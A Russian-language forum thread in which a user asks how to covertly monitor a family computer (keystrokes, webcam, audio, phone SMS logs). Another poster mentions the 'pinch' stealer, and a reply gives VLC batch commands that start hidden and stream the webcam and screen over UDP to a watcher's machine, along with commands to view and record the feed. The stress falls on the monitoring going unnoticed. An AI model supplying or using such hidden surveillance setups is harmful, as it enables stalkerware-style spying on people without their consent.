Удалённое наблюдение за компом

Обсуждение софта. Установка, настройка, новинки. В общем все, что связано с софтом.
Ответить
Аватара пользователя
IgorPes
Сообщения: 753
Зарегистрирован: Сб сен 01, 2012 8:10 am
Контактная информация:

Удалённое наблюдение за компом

Сообщение IgorPes »

Возникла жёсткая необходимость отслеживать один комп.
Требования такие: слежение за клавиатурой/мышкой ведение логов, удалённое наблюдение через вебкамеру и прослушка звука.
На просторах гугля нарыл подходящую по требованиям - Win Spy Software Pro, подходит по всем параметрам, кроме стоимости и отсутствие на данный момент пролеченной версии.
Если кто чем пользовался похожим поделитесь опытом. Можно конечно комбинировать из нескольких программ, но уже геморрно.

ПС если кто знает какую халявную прогу на мобилу в похожем стиле, сделанную на яве, и не требующую смартфона, т.е. просто ведение лога звонков и смс, и соответственно отправка в нужное место, будет тоже оч не плохо.

Аватара пользователя
arxont
Сообщения: 3948
Зарегистрирован: Пт авг 31, 2012 11:29 pm

Re: Удалённое наблюдение за компом

Сообщение arxont »

пинч?
Киберпанк не умер. Он просто наступил.

Аватара пользователя
IgorPes
Сообщения: 753
Зарегистрирован: Сб сен 01, 2012 8:10 am
Контактная информация:

Re: Удалённое наблюдение за компом

Сообщение IgorPes »

нет, компы мои, в смысле моей семьи, поэтому доступ полный есть, но ввиду некоторых моментов мне нужно не только лог работы за компами, но и удалённое слежение, в общих чертах могу только сказать, что кое что произошло, происходит, и я никак не пойму к чему всё идёт, надо разобраться...

Аватара пользователя
b0r1sus
Сообщения: 828
Зарегистрирован: Сб сен 01, 2012 9:20 am
Контактная информация:

Re: Удалённое наблюдение за компом

Сообщение b0r1sus »

Передача видео с экрана со звуком с одного компьютера на другой, с последующей записью тебе подойдет?

Аватара пользователя
IgorPes
Сообщения: 753
Зарегистрирован: Сб сен 01, 2012 8:10 am
Контактная информация:

Re: Удалённое наблюдение за компом

Сообщение IgorPes »

вполне, главное что бы незаметно. В описании выше указанной проги есть всё что нужно.
Пока что аналогов ей не нашёл, а гадский гугл матерится, что в связи с угрозами термоядерного взрыва где то в далёкой галактике он заблокировал часть ссылок, видимо ту часть откуда можно было бы программку поиметь. :(

Аватара пользователя
b0r1sus
Сообщения: 828
Зарегистрирован: Сб сен 01, 2012 9:20 am
Контактная информация:

Re: Удалённое наблюдение за компом

Сообщение b0r1sus »

VLC можно рассмотреть как вариант в качестве бесплатного и кросс-платформенного решения.

Как настроить скрытый запуск и трансяцию видео с вэбкамеры через HTTP расписано здесь: https://forum.antichat.ru/printthread.php?t=360902

Вместо того чтобы подключаться к наблюдаемому компьютеру через HTTP, можно использовать UDP-соединение. При UDP-соединении, наблюдаемый компьютер будет сам слать пакеты на компьюютер наблюдателя на нужные UDP-порты. А наблюдатель может смело брать и слушать порты или сохранять данные, переданные через них на диск.

VLC может работать в несколько процессов благодаря чему можно одновременно смотреть за экраном и происходящим через Web-камеру.

Примеры для клиента:
webcam.bat

Отправка видео с камеры на компьютер 192.168.1.3 и UDP-порт 1235

Код: Выделить всё

"C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" -vvv --no-qt-notification --qt-start-minimized dshow:// :dshow-vdev="USB Camera"  --sout "#transcode{vcodec=mp2v,vb=800,scale=1,acodec=mpga,ab=128,channels=2,samplerate=44100}:std{access=udp{ttl=1},mux=ts,dst=192.168.1.3:1235}"
screeen.bat

Отправка видео с экрана на компьютер 192.168.1.3 и UDP-порт 1234
Можно изменить параметр scale для передачи экрана 1:1 и параметр :screen-fps=5 для настройки частоты обновления кадров.

Код: Выделить всё

"C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" -vvv --no-qt-notification --qt-start-minimized  screen:// :screen-fps=5 :screen-caching=10 --sout "#transcode{vcodec=mp2v,vb=800,scale=0.5,acodec=mpga,ab=128,channels=2,samplerate=44100}:std{access=udp{ttl=1},mux=ts,dst=192.168.1.3:1234}"
На компьютере-наблюдателе запускаешь просмотр:

Код: Выделить всё

vlc udp://@:1234
или запись

Код: Выделить всё

vlc udp://@:1234 --demux=dump --demuxdump-file=webcam.tmp
P.S.: Захват звука и курсора пока не осуществляется (вродебы как есть решение по звуку, но у меня на 64-битной семерке оно не завелось).

Ответить